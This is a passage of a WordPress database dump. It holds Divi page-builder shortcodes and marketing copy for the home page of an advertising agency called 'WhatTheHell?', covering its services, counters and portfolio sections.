button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:25:22','2020-07-06 21:25:22','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(267,1,'2020-07-06 21:27:06','2020-07-06 21:27:06','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" 